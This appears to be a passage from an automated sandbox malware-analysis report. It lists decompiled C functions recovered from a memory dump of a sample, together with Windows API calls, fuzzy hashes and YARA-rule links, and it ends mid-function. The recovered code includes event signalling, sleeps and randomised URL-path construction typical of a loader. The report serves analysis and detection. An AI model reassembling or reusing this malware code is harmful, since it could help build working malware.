                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3041852380-0
                                                                                                                                                                                                                                • Opcode ID: 72197577a7319a851897e57fa2e4172cc029e7bee15a6b290aa98dcb9923fa8a
                                                                                                                                                                                                                                • Instruction ID: 4e6cfb25b7ca9861bd8043c280715ac93770b2e90fc4b7ba00834ee423a7c08e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72197577a7319a851897e57fa2e4172cc029e7bee15a6b290aa98dcb9923fa8a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F41A171A00219AFDB229F68DC54BFE777AEF45310F4045A9B909A7281DBF0AE44CF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6C82, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E02BB6C82(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2bbd2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2bbd2e0; // 0x273a5a8
				_t3 = _t8 + 0x2bbe876; // 0x61636f4c
				_t25 = 0;
				_t30 = E02BB6E66(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2bbd2e4, 1, 0, _t30);
					E02BB53BB(_t30);
				}
				_t12 =  *0x2bbd294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BBA1D4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02BB74A5(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2bbd108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02BB6ABB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                                                                                                                                0x02bb6c83
                                                                                                                                                                                                                                0x02bb6c8a
                                                                                                                                                                                                                                0x02bb6c94
                                                                                                                                                                                                                                0x02bb6c98
                                                                                                                                                                                                                                0x02bb6c9e
                                                                                                                                                                                                                                0x02bb6cad
                                                                                                                                                                                                                                0x02bb6cb4
                                                                                                                                                                                                                                0x02bb6cb8
                                                                                                                                                                                                                                0x02bb6cca
                                                                                                                                                                                                                                0x02bb6ccc
                                                                                                                                                                                                                                0x02bb6ccc
                                                                                                                                                                                                                                0x02bb6cd1
                                                                                                                                                                                                                                0x02bb6cd8
                                                                                                                                                                                                                                0x02bb6d2f
                                                                                                                                                                                                                                0x02bb6d2f
                                                                                                                                                                                                                                0x02bb6d35
                                                                                                                                                                                                                                0x02bb6d37
                                                                                                                                                                                                                                0x02bb6d37
                                                                                                                                                                                                                                0x02bb6d41
                                                                                                                                                                                                                                0x02bb6d45
                                                                                                                                                                                                                                0x02bb6d57
                                                                                                                                                                                                                                0x02bb6d57
                                                                                                                                                                                                                                0x02bb6d5b
                                                                                                                                                                                                                                0x02bb6d61
                                                                                                                                                                                                                                0x02bb6d61
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb6cf1
                                                                                                                                                                                                                                0x02bb6cf6
                                                                                                                                                                                                                                0x02bb6cfe
                                                                                                                                                                                                                                0x02bb6d02
                                                                                                                                                                                                                                0x02bb6d06
                                                                                                                                                                                                                                0x02bb6d06
                                                                                                                                                                                                                                0x02bb6d13
                                                                                                                                                                                                                                0x02bb6d17
                                                                                                                                                                                                                                0x02bb6d1b
                                                                                                                                                                                                                                0x02bb6d70
                                                                                                                                                                                                                                0x02bb6d76
                                                                                                                                                                                                                                0x02bb6d76
                                                                                                                                                                                                                                0x02bb6d29
                                                                                                                                                                                                                                0x02bb6d2d
                                                                                                                                                                                                                                0x02bb6d64
                                                                                                                                                                                                                                0x02bb6d66
                                                                                                                                                                                                                                0x02bb6d69
                                                                                                                                                                                                                                0x02bb6d69
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb6d66
                                                                                                                                                                                                                                0x02bb6d2d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb6d17

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6E66: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,052F9BB8,00000000,?,?,69B25F44,00000005,02BBD00C,?,?,02BB588F), ref: 02BB6E9C
                                                                                                                                                                                                                                  • Part of subcall function 02BB6E66: lstrcpy.KERNEL32(00000000,00000000), ref: 02BB6EC0
                                                                                                                                                                                                                                  • Part of subcall function 02BB6E66: lstrcat.KERNEL32(00000000,00000000), ref: 02BB6EC8
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(02BBD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BB521B,?,00000001,?), ref: 02BB6CC3
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,02BB521B,00000000,00000000,?,00000000,?,02BB521B,?,00000001,?,?,?,?,02BBA0EC), ref: 02BB6D23
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02BB521B,?,00000001,?), ref: 02BB6D51
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BB521B,?,00000001,?,?,?,?,02BBA0EC), ref: 02BB6D69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 73268831-0
                                                                                                                                                                                                                                • Opcode ID: 92c69544c8ad0d89eb0a2bc3436fe28fd12c9e19242860885ea0b153e9d9556b
                                                                                                                                                                                                                                • Instruction ID: a3d293f55232ea8d0b2b5a32bf15106d1e5f0779f8a65c81ae93446b11fb2907
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92c69544c8ad0d89eb0a2bc3436fe28fd12c9e19242860885ea0b153e9d9556b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21F272A407566BCB335A6AC884BFB77ADEF88B54F050AA5F945AB100DBE4CC018750
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB516C, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 40%
                                                                                                                                                                                                                                			E02BB516C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02BB5597(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02BB2C67(_t23);
						}
					}
					return _t38;
				}
				if(E02BB9B32(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2bbd2e4, 1, 0,  *0x2bbd384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02BB2D1C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02BB4847(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02BB704F(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02BB6C82( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                                                                                                                0x02bb516c
                                                                                                                                                                                                                                0x02bb5179
                                                                                                                                                                                                                                0x02bb517f
                                                                                                                                                                                                                                0x02bb5180
                                                                                                                                                                                                                                0x02bb5181
                                                                                                                                                                                                                                0x02bb5182
                                                                                                                                                                                                                                0x02bb5183
                                                                                                                                                                                                                                0x02bb5187
                                                                                                                                                                                                                                0x02bb5193
                                                                                                                                                                                                                                0x02bb5197
                                                                                                                                                                                                                                0x02bb521f
                                                                                                                                                                                                                                0x02bb521f
                                                                                                                                                                                                                                0x02bb5222
                                                                                                                                                                                                                                0x02bb5224
                                                                                                                                                                                                                                0x02bb522c
                                                                                                                                                                                                                                0x02bb522c
                                                                                                                                                                                                                                0x02bb5232
                                                                                                                                                                                                                                0x02bb5235
                                                                                                                                                                                                                                0x02bb5235
                                                                                                                                                                                                                                0x02bb5232
                                                                                                                                                                                                                                0x02bb5240
                                                                                                                                                                                                                                0x02bb5240
                                                                                                                                                                                                                                0x02bb51aa
                                                                                                                                                                                                                                0x02bb51ac
                                                                                                                                                                                                                                0x02bb51ac
                                                                                                                                                                                                                                0x02bb51c3
                                                                                                                                                                                                                                0x02bb51c7
                                                                                                                                                                                                                                0x02bb51ca
                                                                                                                                                                                                                                0x02bb51d5
                                                                                                                                                                                                                                0x02bb51dc
                                                                                                                                                                                                                                0x02bb51dc
                                                                                                                                                                                                                                0x02bb51e5
                                                                                                                                                                                                                                0x02bb51e9
                                                                                                                                                                                                                                0x02bb51f7
                                                                                                                                                                                                                                0x02bb51eb
                                                                                                                                                                                                                                0x02bb51eb
                                                                                                                                                                                                                                0x02bb51ec
                                                                                                                                                                                                                                0x02bb51ed
                                                                                                                                                                                                                                0x02bb51ee
                                                                                                                                                                                                                                0x02bb51ef
                                                                                                                                                                                                                                0x02bb51f0
                                                                                                                                                                                                                                0x02bb51f0
                                                                                                                                                                                                                                0x02bb51fc
                                                                                                                                                                                                                                0x02bb51ff
                                                                                                                                                                                                                                0x02bb5203
                                                                                                                                                                                                                                0x02bb5205
                                                                                                                                                                                                                                0x02bb5205
                                                                                                                                                                                                                                0x02bb520c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb520e
                                                                                                                                                                                                                                0x02bb520e
                                                                                                                                                                                                                                0x02bb521b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb521b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(02BBD2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,02BBA0EC,?,00000001,?), ref: 02BB51BD
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,02BBA0EC,?,00000001,?,00000002,?,?,02BB58BD,?), ref: 02BB51CA
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,02BBA0EC,?,00000001,?,00000002,?,?,02BB58BD,?), ref: 02BB51D5
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,02BBA0EC,?,00000001,?,00000002,?,?,02BB58BD,?), ref: 02BB51DC
                                                                                                                                                                                                                                  • Part of subcall function 02BB2D1C: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BB51FC,?,02BB51FC,?,?,?,?,?,02BB51FC,?), ref: 02BB2DF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559942907-0
                                                                                                                                                                                                                                • Opcode ID: f367ab3f8a1bf706baa0a2e19655cc0b37f4eb87e979c549fe47e8cbb8388725
                                                                                                                                                                                                                                • Instruction ID: 681c443564003679e5becb05d05d7b8811e82948fed1ef36d1be187c29bf29eb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f367ab3f8a1bf706baa0a2e19655cc0b37f4eb87e979c549fe47e8cbb8388725
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D210733D00259AFCF33AFE4C8848FEB77AEF08344B8048A6EA51A7000D7F499418B61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB1A54, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E02BB1A54(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02BB5157(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                                                                                                                0x02bb1a60
                                                                                                                                                                                                                                0x02bb1a64
                                                                                                                                                                                                                                0x02bb1a65
                                                                                                                                                                                                                                0x02bb1a66
                                                                                                                                                                                                                                0x02bb1a68
                                                                                                                                                                                                                                0x02bb1a6a
                                                                                                                                                                                                                                0x02bb1a6d
                                                                                                                                                                                                                                0x02bb1a72
                                                                                                                                                                                                                                0x02bb1b09
                                                                                                                                                                                                                                0x02bb1b10
                                                                                                                                                                                                                                0x02bb1b10
                                                                                                                                                                                                                                0x02bb1a7b
                                                                                                                                                                                                                                0x02bb1a82
                                                                                                                                                                                                                                0x02bb1a92
                                                                                                                                                                                                                                0x02bb1a92
                                                                                                                                                                                                                                0x02bb1a98
                                                                                                                                                                                                                                0x02bb1a9a
                                                                                                                                                                                                                                0x02bb1a9f
                                                                                                                                                                                                                                0x02bb1aa8
                                                                                                                                                                                                                                0x02bb1aae
                                                                                                                                                                                                                                0x02bb1ab3
                                                                                                                                                                                                                                0x02bb1abe
                                                                                                                                                                                                                                0x02bb1ac2
                                                                                                                                                                                                                                0x02bb1ac4
                                                                                                                                                                                                                                0x02bb1ac5
                                                                                                                                                                                                                                0x02bb1ace
                                                                                                                                                                                                                                0x02bb1ad2
                                                                                                                                                                                                                                0x02bb1ae3
                                                                                                                                                                                                                                0x02bb1ad4
                                                                                                                                                                                                                                0x02bb1ad9
                                                                                                                                                                                                                                0x02bb1ade
                                                                                                                                                                                                                                0x02bb1aed
                                                                                                                                                                                                                                0x02bb1aed
                                                                                                                                                                                                                                0x02bb1ac2
                                                                                                                                                                                                                                0x02bb1af3
                                                                                                                                                                                                                                0x02bb1af9
                                                                                                                                                                                                                                0x02bb1af9
                                                                                                                                                                                                                                0x02bb1b02
                                                                                                                                                                                                                                0x02bb1b07
                                                                                                                                                                                                                                0x02bb1b07
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198164300-0
                                                                                                                                                                                                                                • Opcode ID: aa578e715780dcc02f9f9a743290673834d63c988f016c0345df8889b2f57329
                                                                                                                                                                                                                                • Instruction ID: 866c3632b63f36f46ad51bba8a70b68e55613644f4cd1f799b3bedbc1a59a947
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa578e715780dcc02f9f9a743290673834d63c988f016c0345df8889b2f57329
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0214475900209EFCB12DFA8D8989EEBBB9FF49345B1041A9E915D7210E7B0EA41CF60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB698B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E02BB698B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2bbd270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2bbd288; // 0x94834a61
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2bbd288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                                                                                                                0x02bb6993
                                                                                                                                                                                                                                0x02bb6996
                                                                                                                                                                                                                                0x02bb699c
                                                                                                                                                                                                                                0x02bb69b4
                                                                                                                                                                                                                                0x02bb69b6
                                                                                                                                                                                                                                0x02bb69bb
                                                                                                                                                                                                                                0x02bb69bd
                                                                                                                                                                                                                                0x02bb69c0
                                                                                                                                                                                                                                0x02bb69c2
                                                                                                                                                                                                                                0x02bb69c5
                                                                                                                                                                                                                                0x02bb69c7
                                                                                                                                                                                                                                0x02bb69c7
                                                                                                                                                                                                                                0x02bb69c9
                                                                                                                                                                                                                                0x02bb69d4
                                                                                                                                                                                                                                0x02bb69d9
                                                                                                                                                                                                                                0x02bb69ea
                                                                                                                                                                                                                                0x02bb69f2
                                                                                                                                                                                                                                0x02bb69f7
                                                                                                                                                                                                                                0x02bb69fa
                                                                                                                                                                                                                                0x02bb69fd
                                                                                                                                                                                                                                0x02bb69ff
                                                                                                                                                                                                                                0x02bb6a02
                                                                                                                                                                                                                                0x02bb6a05
                                                                                                                                                                                                                                0x02bb6a05
                                                                                                                                                                                                                                0x02bb6a08
                                                                                                                                                                                                                                0x02bb6a13
                                                                                                                                                                                                                                0x02bb6a18
                                                                                                                                                                                                                                0x02bb6a22

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BB233E,00000000,?,?,02BBA714,?,052F95B0), ref: 02BB6996
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BB69AE
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02BB233E,00000000,?,?,02BBA714,?,052F95B0), ref: 02BB69F2
                                                                                                                                                                                                                                • memcpy.NTDLL(00000001,?,00000001), ref: 02BB6A13
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1819133394-0
                                                                                                                                                                                                                                • Opcode ID: fe1e9c45a75d72024a680b0eaed8b8ef0eb0f532c63d9af0d093bf411f5b0436
                                                                                                                                                                                                                                • Instruction ID: e375fdf241846d393b71646bbbeca6d5b07938f931957127dad5089fae220db4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe1e9c45a75d72024a680b0eaed8b8ef0eb0f532c63d9af0d093bf411f5b0436
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7110672E00115AFC716CA69DC84DAABFBEEFC53A0B0501BAE54497140E7B0DE048760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6ABB, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                                                                                			E02BB6ABB(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E02BB10E9(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2bbd2e0; // 0x273a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2bbe4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2bbe8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02BB7020();
					_push( &_v64);
					if( *0x2bbd0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02BB7020();
				}
				return _t28;
			}














                                                                                                                                                                                                                                0x02bb6abb
                                                                                                                                                                                                                                0x02bb6ac2
                                                                                                                                                                                                                                0x02bb6ad0
                                                                                                                                                                                                                                0x02bb6ad4
                                                                                                                                                                                                                                0x02bb6ade
                                                                                                                                                                                                                                0x02bb6ae3
                                                                                                                                                                                                                                0x02bb6ae8
                                                                                                                                                                                                                                0x02bb6aed
                                                                                                                                                                                                                                0x02bb6af7
                                                                                                                                                                                                                                0x02bb6b01
                                                                                                                                                                                                                                0x02bb6b01
                                                                                                                                                                                                                                0x02bb6af9
                                                                                                                                                                                                                                0x02bb6af9
                                                                                                                                                                                                                                0x02bb6af9
                                                                                                                                                                                                                                0x02bb6af9
                                                                                                                                                                                                                                0x02bb6b07
                                                                                                                                                                                                                                0x02bb6b0d
                                                                                                                                                                                                                                0x02bb6b0e
                                                                                                                                                                                                                                0x02bb6b11
                                                                                                                                                                                                                                0x02bb6b14
                                                                                                                                                                                                                                0x02bb6b17
                                                                                                                                                                                                                                0x02bb6b1f
                                                                                                                                                                                                                                0x02bb6b28
                                                                                                                                                                                                                                0x02bb6b30
                                                                                                                                                                                                                                0x02bb6b30
                                                                                                                                                                                                                                0x02bb6b32
                                                                                                                                                                                                                                0x02bb6b34
                                                                                                                                                                                                                                0x02bb6b34
                                                                                                                                                                                                                                0x02bb6b3e

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB10E9: SysAllocString.OLEAUT32(00000000), ref: 02BB1143
                                                                                                                                                                                                                                  • Part of subcall function 02BB10E9: SysAllocString.OLEAUT32(0070006F), ref: 02BB1157
                                                                                                                                                                                                                                  • Part of subcall function 02BB10E9: SysAllocString.OLEAUT32(00000000), ref: 02BB1169
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB6ADE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB6B2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$ErrorLastmemset
                                                                                                                                                                                                                                • String ID: <$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3736384471-3662781078
                                                                                                                                                                                                                                • Opcode ID: 4a175a177f2d84ef7793f44689fbbe69e88545062a44af9f9af5a4ff6f939f50
                                                                                                                                                                                                                                • Instruction ID: 6eb8650b0581c19a656eedf74f155a241a207cb4474529de09f573ff59fb9fcb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a175a177f2d84ef7793f44689fbbe69e88545062a44af9f9af5a4ff6f939f50
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C101E171D00218AFDB12EF95D895EEEBBBCEF08744F454466F904E7150D7B09904CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BBA1D4, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E02BBA1D4() {
				char _v264;
